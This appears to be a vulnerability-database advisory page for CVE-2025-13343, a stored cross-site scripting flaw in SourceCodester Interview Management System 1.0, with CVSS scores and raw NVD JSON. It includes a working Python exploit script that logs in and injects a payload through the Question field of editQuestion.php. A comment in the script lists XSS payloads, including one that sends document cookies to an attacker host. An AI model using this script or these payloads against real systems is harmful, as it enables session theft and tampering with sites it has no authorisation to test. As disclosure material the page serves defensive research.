Security Vulnerability Report
中文
CVE-2025-13343 CVSS 3.5 LOW

CVE-2025-13343

Published: 2025-11-18 12:15:44
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in SourceCodester Interview Management System 1.0. Affected is an unknown function of the file /editQuestion.php. The manipulation of the argument Question results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:janobe:interview_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Interview Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse # CVE-2025-13343 PoC - SourceCodester Interview Management System XSS # Target: /editQuestion.php # Parameter: Question def exploit_xss(target_url, username, password, payload): """ Exploit stored XSS in Question parameter of editQuestion.php Args: target_url: Base URL of the vulnerable application username: Valid username for authentication password: User password payload: XSS payload to inject """ session = requests.Session() # Step 1: Login to get authenticated session login_url = f"{target_url}/login.php" login_data = { "username": username, "password": password } try: response = session.post(login_url, data=login_data, timeout=10) print(f"[*] Login attempt completed. Status: {response.status_code}") # Step 2: Create initial question create_url = f"{target_url}/addQuestion.php" question_data = { "question": "Initial question for testing", "category": "Technical", "submit": "submit" } response = session.post(create_url, data=question_data, timeout=10) print(f"[*] Question created. Status: {response.status_code}") # Step 3: Exploit XSS by editing the question with malicious payload edit_url = f"{target_url}/editQuestion.php" edit_data = { "id": "1", # Adjust question ID as needed "Question": payload, # XSS payload injection point "submit": "Update" } response = session.post(edit_url, data=edit_data, timeout=10) print(f"[*] XSS payload injected. Status: {response.status_code}") print(f"[*] Payload: {payload}") print(f"[!] XSS will trigger when admin views the question list") # Common XSS payloads for testing: # <script>alert(document.domain)</script> # <img src=x onerror=alert('XSS')> # <svg/onload=fetch('http://attacker.com/?c='+document.cookie)> except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-13343 XSS Exploit') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-un', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') parser.add_argument('-x', '--payload', default='<script>alert(document.cookie)</script>', help='XSS Payload') args = parser.parse_args() exploit_xss(args.url, args.username, args.password, args.payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13343", "sourceIdentifier": "[email protected]", "published": "2025-11-18T12:15:43.610", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Interview Management System 1.0. Affected is an unknown function of the file /editQuestion.php. The manipulation of the argument Question results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:janobe:interview_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "765F8425-3BE1-4C95-A372-B03A323B3C5C"}]}]}], "references": [{"url": "https://github.com/puppytgyh/-CVE/issues/11", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332761", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332761", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691936", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.